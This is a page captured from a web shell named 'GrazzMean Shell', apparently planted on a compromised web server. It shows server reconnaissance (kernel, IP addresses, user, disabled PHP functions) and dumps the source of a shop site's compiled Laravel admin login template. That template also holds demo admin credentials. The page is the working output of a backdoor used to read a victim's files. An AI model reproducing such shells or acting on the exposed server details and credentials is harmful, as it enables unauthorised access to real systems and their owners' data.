shell bypass 403

GrazzMean Shell

Uname: Linux peekpos.com 6.8.0-1060-aws #63~22.04.1-Ubuntu SMP Tue Jun 30 02:32:53 UTC 2026 x86_64
Software: Apache
PHP version: 8.3.25 [ PHP INFO ] PHP os: Linux
Server Ip: 47.130.192.226
Your Ip: 10.1.31.86
User: www (1001) | Group: www (1001)
Safe Mode: OFF
Disable Function:
passthru,putenv,chroot,chgrp,chown,shell_exec,popen,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

name : 6911dfcd95e96e678d6eba99a3bc0577.php
<!DOCTYPE html>
<html lang="en" dir="<?php echo e(session('direction') == 2 ? 'rtl' : 'ltr'); ?>" class="light">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="csrf-token" content="<?php echo e(csrf_token()); ?>" />
    <meta name="viewport" content="width=device-width,initial-scale=1">

    <script>
        const theme = localStorage.getItem('theme');
        if (theme === 'dark') {
            document.documentElement.classList.add('dark');
        } else {
            document.documentElement.classList.add('light');
        }
    </script>

    <title><?php echo e(@helper::appdata()->title); ?></title>
    <link rel="icon" type="image/png" sizes="16x16" href="<?php echo e(helper::image_path(@helper::appdata()->favicon)); ?>">
    <!-- Favicon icon -->
    <link rel="stylesheet"
        href="<?php echo e(url(env('ASSETSPATHURL') . 'admin-assets/assets/css/bootstrap/bootstrap.min.css')); ?>">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="<?php echo e(url(env('ASSETSPATHURL') . 'admin-assets/assets/css/fontawesome/all.min.css')); ?>">
    <!-- FontAwesome CSS -->
    <link rel="stylesheet" href="<?php echo e(url(env('ASSETSPATHURL') . 'admin-assets/assets/css/toastr/toastr.min.css')); ?>">
    <!-- FontAwesome CSS -->
    <link rel="stylesheet" href="<?php echo e(url(env('ASSETSPATHURL') . 'admin-assets/assets/css/style.css')); ?>">
    <!-- Custom CSS -->
    <link rel="stylesheet" href="<?php echo e(url(env('ASSETSPATHURL') . 'admin-assets/assets/css/responsive.css')); ?>">
    <!-- Responsive CSS -->
    <style>
        :root {
            /* Color */
            --bs-primary: <?php echo e(helper::appdata('')->web_primary_color); ?>;
            --bs-secondary: <?php echo e(helper::appdata('')->web_secondary_color); ?>;
        }
    </style>
</head>

<body>
    <div class="row align-items-center g-0 w-100 h-100vh position-relative">
        <div class="col-lg-7 col-md-6 d-md-block d-none">
            <div class="login-left-content">
                <img src="<?php echo e(helper::image_path(@helper::appdata()->admin_auth_bg_image)); ?>"
                    class="h-100 w-100 object-fit-cover" alt="">
            </div>
        </div>
        <div class="col-lg-5 col-md-6 overflow-hidden">
            <div class="login-right-content login-forgot-padding row m-0">
                <div class="pb-0 px-0">
                    <div class="login-logo mb-3">
                        <img src="<?php echo e(helper::image_path(@helper::appdata()->logo)); ?>" class="logo-img" alt="">
                    </div>
                    <div class="text-primary d-flex justify-content-between">
                        <div>
                            <h3 class="fw-bold text-color color-changer title-text mb-2"><?php echo e(trans('labels.sign_in')); ?>

                            </h3>
                            <p class="text-color color-changer">Please Login to continue to your account</p>
                        </div>
                        <!-- language -->
                        <div class="lag-btn dropdown border-0 shadow-none login-lang">
                            <a class="btn btn-sm border-0 p-0" role="button" data-bs-toggle="dropdown"
                                aria-expanded="false">
                                <img src="<?php echo e(helper::image_path(session()->get('flag'))); ?>" alt=""
                                    class="rounded-5 language-width">
                            </a>
                            <ul
                                class="dropdown-menu rounded-1 p-0 mt-1 rounded-3 border-0 bg-body-secondary shadow overflow-hidden <?php echo e(session()->get('direction') == '2' ? 'min-dropdown-rtl' : 'min-dropdown'); ?>">
                                <?php $__currentLoopData = helper::language(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $lang): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                    <li>
                                        <a class="dropdown-item text-dark d-flex gap-2 align-items-center text-left px-2 py-2"
                                            href="<?php echo e(URL::to('/language-' . $lang->code)); ?>">
                                            <img src="<?php echo e(helper::image_path($lang->image)); ?>" alt=""
                                                class="lag-img rounded-circle w-25">
                                            <?php echo e($lang->name); ?>

                                        </a>
                                    </li>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </ul>
                        </div>

                    </div>
                    <form class="my-3" method="POST" action="<?php echo e(URL::to('admin/check-login')); ?>" id="login-form">
                        <?php echo csrf_field(); ?>
                        <div class="g-3 row">
                            <div class="form-group">
                                <label for="email"
                                    class="form-label fs-7 text-color"><?php echo e(trans('labels.email')); ?><span
                                        class="text-danger"> *
                                    </span></label>
                                <input id="email" type="email"
                                    class="form-control extra-padding <?php $__errorArgs = ['email'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?> is-invalid <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>"
                                    name="email" required="" autocomplete="email" autofocus
                                    placeholder="<?php echo e(trans('labels.email')); ?>">
                                <?php $__errorArgs = ['email'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?>
                                    <span class="invalid-feedback"
                                        role="alert"><strong><?php echo e($message); ?></strong></span>
                                <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>
                            </div>
                            <div class="form-group">
                                <label for="password"
                                    class="form-label fs-7 text-color"><?php echo e(trans('labels.password')); ?><span
                                        class="text-danger">
                                        * </span></label>
                                <div class="form-control extra-padding d-flex align-items-center gap-3">
                                    <input id="password" type="password"
                                        class="form-control border-0 p-0 <?php $__errorArgs = ['password'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?> is-invalid <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>"
                                        name="password" required autocomplete="current-password"
                                        placeholder="<?php echo e(trans('labels.password')); ?>">
                                    <?php $__errorArgs = ['password'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?>
                                        <span class="invalid-feedback"
                                            role="alert"><strong><?php echo e($message); ?></strong></span>
                                    <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>
                                    <span>
                                        <a href="#"><i class="fa-light fa-eye-slash color-changer"
                                                id="eye"></i></a>
                                    </span>
                                </div>

                            </div>
                        </div>
                        <div class="d-flex mt-2 justify-content-between align-items-center gap-2">
                            <div class="form-group m-0 d-flex align-items-center">
                                <input class="form-check-input mt-0" type="checkbox" value="" name="check_terms"
                                    id="check_terms" checked="" required="">
                                <label class="form-check-label cursor-pointer mx-1" for="check_terms">
                                    <span class="fs-7 text-color">
                                        <?php echo e(trans('labels.remember_me')); ?>

                                    </span>
                                </label>
                            </div>

                            <div>
                                <a href="<?php echo e(URL::to('admin/forgot-password')); ?>" class="fs-7 fw-600 color-changer">
                                    <?php echo e(trans('labels.forgot_password_q')); ?>

                                </a>
                            </div>
                        </div>
                        <button class="btn btn-primary px-4 login-btn w-100 my-3"
                            type="submit"><?php echo e(trans('labels.signin')); ?></button>
                        <?php if(env('Environment') == 'sendbox'): ?>
                            <div class="border-bottom my-3">
                            </div>
                            <p class="text-center text-danger">Explore with <b
                                    class="text-black color-changer">FREE</b> addons</p>

                            <div class="d-flex">
                                <button class="btn btn-secondary w-100 mt-2 mb-3 padding mx-2"
                                    id="admin_free_addon_login">Admin login</button>
                            </div>

                            <p class="text-center text-danger">Explore with <b
                                    class="text-black color-changer">ALL</b> addons</p>

                            <div class="d-flex">
                                <button class="btn btn-secondary w-100 mt-2 mb-3 padding mx-2" id="all-addon">Admin
                                    login</button>
                            </div>

                            <p class="text-center text-danger"><b class="text-black color-changer">Demo Themes</b></p>

                            <div class="d-flex">
                                <a href="https://grocerygo.infotechgravity.com/?theme_id=1" target="_blank"
                                    class="btn btn-primary w-100 mt-2 mb-3 padding mx-2">Theme - 1 (Included)</a>
                                <a href="https://grocerygo.infotechgravity.com/?theme_id=2" target="_blank"
                                    class="btn btn-secondary w-100 mt-2 mb-3 padding mx-2">Theme - 2 (Addon)</a>
                                <a href="https://grocerygo.infotechgravity.com/?theme_id=3" target="_blank"
                                    class="btn btn-secondary w-100 mt-2 mb-3 padding mx-2">Theme - 3 (Addon)</a>
                            </div>
                        <?php endif; ?>
                    </form>
                </div>
            </div>
        </div>
    </div>




    <script src="<?php echo e(url(env('ASSETSPATHURL') . 'admin-assets/assets/js/jquery/jquery.min.js')); ?>"></script><!-- jQuery JS -->
    <script src="<?php echo e(url(env('ASSETSPATHURL') . 'admin-assets/assets/js/bootstrap/bootstrap.bundle.min.js')); ?>"></script><!-- Bootstrap JS -->
    <script src="<?php echo e(url(env('ASSETSPATHURL') . 'admin-assets/assets/js/toastr/toastr.min.js')); ?>"></script><!-- Toastr JS -->
    <script>
        toastr.options = {
            "closeButton": true,
            "progressBar": true
        }
        <?php if(Session::has('success')): ?>
            toastr.success("<?php echo e(session('success')); ?>");
        <?php endif; ?>
        <?php if(Session::has('error')): ?>
            toastr.error("<?php echo e(session('error')); ?>");
        <?php endif; ?>
        $(window).on("load", function() {
            "use strict";
            $('#preloader').fadeOut('slow')
        });
    </script>
    <script>
        function setLightMode() {
            document.documentElement.classList.remove('dark');
            document.documentElement.classList.add('light');
            localStorage.setItem('theme', 'light');
        }

        function setDarkMode() {
            document.documentElement.classList.remove('light');
            document.documentElement.classList.add('dark');
            localStorage.setItem('theme', 'dark');
        }
    </script>
    <script>
        function AdminFill(email, password) {
            $('#email').val(email);
            $('#password').val(password);
        }

        $(document).on("click", "#admin_free_addon_login", function() {
            $("#admin_free_addon_login").attr("disabled", true);

            $("#email").val('admin@gmail.com');
            $("#password").val('123456');
            SessionSave('free-addon');
        });

        $(document).on("click", "#all-addon", function() {
            $("#all-addon").attr("disabled", true);

            $("#email").val('admin@gmail.com');
            $("#password").val('123456');
            SessionSave('all-addon');
        });

        function SessionSave(addon = null) {

            $.ajax({
                headers: {
                    'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')
                },
                type: "POST",
                dataType: "json",
                url: "<?php echo e(URL::to('add-on/session/save')); ?>",
                data: {
                    'demo_type': addon,
                },
                success: function(response) {
                    $('#login-form').submit();
                }
            });
        }
    </script>
</body>

</html>
<?php /**PATH /www/wwwroot/koreanshop.lk/resources/views/admin/auth/login.blade.php ENDPATH**/ ?>
© 2026 GrazzMean